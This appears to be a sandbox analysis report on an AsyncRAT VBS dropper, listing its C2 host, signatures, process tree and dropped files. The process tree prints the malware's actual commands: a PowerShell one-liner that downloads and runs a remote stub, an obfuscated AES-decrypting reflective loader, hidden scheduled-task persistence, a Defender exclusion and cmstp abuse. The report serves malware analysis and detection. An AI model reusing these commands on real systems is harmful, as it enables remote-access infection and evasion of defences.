Overview

overview

10

Static

static

1

9765_output.vbs

windows7-x64

8

9765_output.vbs

windows10-2004-x64

10

9765_output.vbs

windows10-ltsc 2021-x64

10

9765_output.vbs

windows11-21h2-x64

10

9765_output.vbs

macos-10.15-amd64

4

Analysis

  • max time kernel
    292s
  • max time network
    300s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    09-12-2024 20:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9765_output.vbs

  • Size

    69KB

  • MD5

    f0a90fbc29a64f4274b014755f88c990

  • SHA1

    e8f7053bea6eab342edf9d80c15835b6fb6d9844

  • SHA256

    df37f986e4342d26e408aa370058ba21d218aaac358ba940bde7ac1f035549d7

  • SHA512

    fc42c09434d77f5688d23eab7700440196d07e517e3940d3b47484f2c4de214301063b9537febf1f3396fcf033cead22b4aecd68f18acc7c6f06f8f06ffc3c77

  • SSDEEP

    768:Oyq+h3xb1DhEhMXSHLGjhlZrkoq22Ub9aLILRNho4rBT9qDCJfJw/urPFpjw4g:lhBJihvKjhbQoDNbUILRUcE4wWrtp0D

Score
10/10
asyncratdefaultdiscoveryexecutionrat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

jt8iyre.localto.net:55644

jt8iyre.localto.net:2101
Mutex

WzRdrlEJS302

Attributes
  • delay

    3

  • install

    false

  • install_file

    dwmm.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 29 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9765_output.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:960
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3976
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4888
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\krqlhq3u\krqlhq3u.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:5004
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5F4.tmp" "c:\Users\Admin\AppData\Local\Temp\krqlhq3u\CSCD352445E4214B5DAD6592B2C95F558.TMP"
            5⤵
              PID:4856
          • C:\windows\system32\cmstp.exe
            "C:\windows\system32\cmstp.exe" /au C:\windows\temp\1fvz2th3.inf
            4⤵
              PID:4752
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:848
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8l4w457KDIom6rIqFxIss0f2qXmFneRo91Mq9t/nGJg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QryA4ACPDNVab4+J6hK+gg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zmSQy=New-Object System.IO.MemoryStream(,$param_var); $CTpIN=New-Object System.IO.MemoryStream; $uhoSQ=New-Object System.IO.Compression.GZipStream($zmSQy, [IO.Compression.CompressionMode]::Decompress); $uhoSQ.CopyTo($CTpIN); $uhoSQ.Dispose(); $zmSQy.Dispose(); $CTpIN.Dispose(); $CTpIN.ToArray();}function execute_function($param_var,$param2_var){ $UlPQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xvztn=$UlPQj.EntryPoint; $xvztn.Invoke($null, $param2_var);}$xRCke = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $xRCke;$gqghP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($xRCke).Split([Environment]::NewLine);foreach ($TgnJP in $gqghP) { if ($TgnJP.StartsWith(':: ')) { $uPmQq=$TgnJP.Substring(20); break; }}$payloads_var=[string[]]$uPmQq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2508
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_166_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_166.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4824
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_166.vbs"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2128
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_166.bat" "
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1380
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8l4w457KDIom6rIqFxIss0f2qXmFneRo91Mq9t/nGJg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QryA4ACPDNVab4+J6hK+gg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zmSQy=New-Object System.IO.MemoryStream(,$param_var); $CTpIN=New-Object System.IO.MemoryStream; $uhoSQ=New-Object System.IO.Compression.GZipStream($zmSQy, [IO.Compression.CompressionMode]::Decompress); $uhoSQ.CopyTo($CTpIN); $uhoSQ.Dispose(); $zmSQy.Dispose(); $CTpIN.Dispose(); $CTpIN.ToArray();}function execute_function($param_var,$param2_var){ $UlPQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xvztn=$UlPQj.EntryPoint; $xvztn.Invoke($null, $param2_var);}$xRCke = 'C:\Users\Admin\AppData\Roaming\startup_str_166.bat';$host.UI.RawUI.WindowTitle = $xRCke;$gqghP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($xRCke).Split([Environment]::NewLine);foreach ($TgnJP in $gqghP) { if ($TgnJP.StartsWith(':: ')) { $uPmQq=$TgnJP.Substring(20); break; }}$payloads_var=[string[]]$uPmQq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4324
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4624
      • C:\Windows\system32\taskkill.exe
        taskkill /IM cmstp.exe /F
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2388

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        627073ee3ca9676911bee35548eff2b8

        SHA1

        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

        SHA256

        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

        SHA512

        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        8ba8fc1034d449222856ea8fa2531e28

        SHA1

        7570fe1788e57484c5138b6cead052fbc3366f3e

        SHA256

        2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2

        SHA512

        7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        18KB

        MD5

        6d0755832f3d8089e4a99f62ddce2733

        SHA1

        af729f5bc17aeb1ff8c8b30279970c27411cab88

        SHA256

        516562a9d8b330cd31ef9e04fe2b12acb48b262291810848de2215b6466e1bb9

        SHA512

        7cdda3ee1bceefe7d7357fd88484903b566cd9e44ded321e416b18b162a754f861a9672ccbdb97a8c4a977907d4c23a35d6cc5e7f72990d36aa3d3f044dd9bd5

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        900c7fac3ccd57351617c0b7e480dcf8

        SHA1

        262d1a39dc55644003ca46399845b0260ec83aee

        SHA256

        53250ca5ebb80432367e035099f602133ef1d97dee0147d428b6a3360cb29bdd

        SHA512

        f5786e5f38ef9ec8f5eb0e573c6c37fdbae24ae6bd04dfbed281e464d7605ab2e6acb9bb5a2fedd1c833bd101cbeadfe691b191863c67f68030cc0cd8db31999

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RESA5F4.tmp
        Filesize

        1KB

        MD5

        249b97289b9e6b6a9966f1dbc061111d

        SHA1

        88a348747ba634c51ce9f1790186602a5d674ca1

        SHA256

        3bb65ba60ae76f1378d146b53c2c8235f5c1852f81be644fe3e4eac9757f8bbf

        SHA512

        8092d72364e21e7e6e65fadddfeb85269655ff7b413c63e1f2c9733bdde7e6a881d641814d30334ab8ff162d91d55f921908eeaa5dc899aeb95e07d723b7642a

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zo0djk10.45x.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\c.bat
        Filesize

        59KB

        MD5

        2fe4e3e118697eead89b94cebee0ed28

        SHA1

        db39a109814414635ab1a4927a7b6e36b4d1c6c7

        SHA256

        49e4034c34b5666f17def98af21b627c4bc9c1e9e8a7022b4d37135d3807d8bd

        SHA512

        ca116d36ff813b12323a25825282ee113295cf71b77e323999b7c6058490924f417e08f27e22549f4b4a996cd6ef84e34ab16c678a86767e76b2f3eb6dad585f

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\krqlhq3u\krqlhq3u.dll
        Filesize

        4KB

        MD5

        106704bda03d34703d88cc3d7e2f3501

        SHA1

        8c8b458ec2a0d597c5f4734ea4b7ae59d071e664

        SHA256

        60f043fdf740e90bcc07d8939848bdba232ee2720719717b3e8ea6961d0c18c1

        SHA512

        015fa41f7d382c044a8a727a42d92df194955b2299285ab7f31c230f503572b8cc2c8acc31fd5f99509d50e57453cbe927cf87be253b3d487b7cd727e6c71447

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_166.vbs
        Filesize

        115B

        MD5

        368b9ef45437db3c8d74b131165dac4a

        SHA1

        08814e207c36f531b3e3efe6eed7c7f45d3ea90e

        SHA256

        983ace1ff7d7220f5bb2dea998f4f603f7869e013e25f9329af6ba02d58b3681

        SHA512

        1879ec6fad3e5ee3a4e3aefd7edc0cddfb1ab8a4cc5aa8e60fe7ab8d76abaa6e60fc0af9b1477abb9c519b0bb8f4d3f8ee07f925bb2ba1dd7d5692a605223c5b

        Download Submit

      • C:\windows\temp\1fvz2th3.inf
        Filesize

        683B

        MD5

        a4fd12b94ad4ac06fabd8dd56dd5ff2b

        SHA1

        940d129205e04ba31b10a72d7a7a236a9ed0488b

        SHA256

        fe9977d49d2ae366779da959a5c9a6cc7664bc82d7c8e243f1baa9aa539cd320

        SHA512

        a4712ad7a23ab7a1eadfdaa7dc73dc406a0a14313c0413561f2f4ba8087c79c504d1d4391585b1b91f580ffef3869a37523707979dd5ab870a596062497e79fe

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\krqlhq3u\CSCD352445E4214B5DAD6592B2C95F558.TMP
        Filesize

        652B

        MD5

        12d8121ef63ccd0a4896e168a45bde3a

        SHA1

        e8335090ddd66c6dd8a3e7c43bb128c2a44fd9ed

        SHA256

        78c5b02ea6b1e42ae47b8b224ca92810a41b5c7080d9e5de7938e48eb3c1827e

        SHA512

        d9c44e685bdd0dd39ea2a006aa831d04c1d7edef9d2ebe5c859e03e2a10804f0e660425876e4fd2a17aeca1b8ca1be461f071ae21ec192c52ac3c5b4a3f2a226

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\krqlhq3u\krqlhq3u.0.cs
        Filesize

        2KB

        MD5

        897ac4306f2a2524bc3c441bd00c72b9

        SHA1

        1703dbf9a2a78491dfd6685540d4691839e33b69

        SHA256

        a889dd1616631e369d253d6d89cc3a253b663e636bb1cdebbf831817592b405b

        SHA512

        2eba96a7960fe4c8c083ffbca30dbff4c5aac6acfa2c99b6ab5802376d028cbf471c3f06fcef9a3a0129dc988df1aceba808c3436cd110c123dc2ba1147c81b6

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\krqlhq3u\krqlhq3u.cmdline
        Filesize

        369B

        MD5

        1207854abf84e6be858a3fadd89e452a

        SHA1

        909ec225deb2bbc408145f00a073a904e2de3842

        SHA256

        8755f8ebcec1c87ba8580c735245b596161975e3331d44dfb39ca00f408ea077

        SHA512

        130e69c0c4c25dde51b5313f9bb79d733fd0241c542c9ae36d4d8968cc1dc0f12d7d69d3f9d2c3f3e41d0e6a246464c409aa13eb3a816dfc68699747edff3a2d

        Download Submit

      • memory/2508-52-0x00000000036A0000-0x00000000036D6000-memory.dmp

        Filesize

        216KB

        Download

      • memory/2508-69-0x0000000008480000-0x0000000008AFA000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/2508-72-0x0000000008B00000-0x00000000090A6000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/2508-71-0x0000000007C80000-0x0000000007C8E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/2508-70-0x0000000007C40000-0x0000000007C5A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2508-68-0x0000000006A80000-0x0000000006ACC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/2508-67-0x0000000006A50000-0x0000000006A6E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2508-65-0x00000000065B0000-0x0000000006907000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/2508-53-0x0000000005DE0000-0x000000000640A000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/2508-54-0x0000000005CA0000-0x0000000005CC2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2508-55-0x0000000005D40000-0x0000000005DA6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2508-56-0x0000000006480000-0x00000000064E6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4324-116-0x0000000005F70000-0x0000000005F82000-memory.dmp

        Filesize

        72KB

        Download

      • memory/4824-95-0x00000000074E0000-0x0000000007576000-memory.dmp

        Filesize

        600KB

        Download

      • memory/4824-94-0x00000000072D0000-0x00000000072DA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4824-92-0x00000000070E0000-0x00000000070FE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4824-96-0x0000000007470000-0x0000000007481000-memory.dmp

        Filesize

        68KB

        Download

      • memory/4824-93-0x0000000007110000-0x00000000071B4000-memory.dmp

        Filesize

        656KB

        Download

      • memory/4824-83-0x0000000071160000-0x00000000711AC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4824-82-0x00000000070A0000-0x00000000070D4000-memory.dmp

        Filesize

        208KB

        Download

      • memory/4888-26-0x000001C96D970000-0x000001C96D978000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4888-42-0x00007FFAB8833000-0x00007FFAB8835000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4888-47-0x00007FFAB8830000-0x00007FFAB92F2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4888-43-0x00007FFAB8830000-0x00007FFAB92F2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4888-0-0x00007FFAB8833000-0x00007FFAB8835000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4888-13-0x000001C96D940000-0x000001C96D95C000-memory.dmp

        Filesize

        112KB

        Download

      • memory/4888-11-0x00007FFAB8830000-0x00007FFAB92F2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4888-10-0x00007FFAB8830000-0x00007FFAB92F2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4888-9-0x000001C96D8A0000-0x000001C96D8C2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4888-12-0x00007FFAB8830000-0x00007FFAB92F2000-memory.dmp

        Filesize

        10.8MB

        Download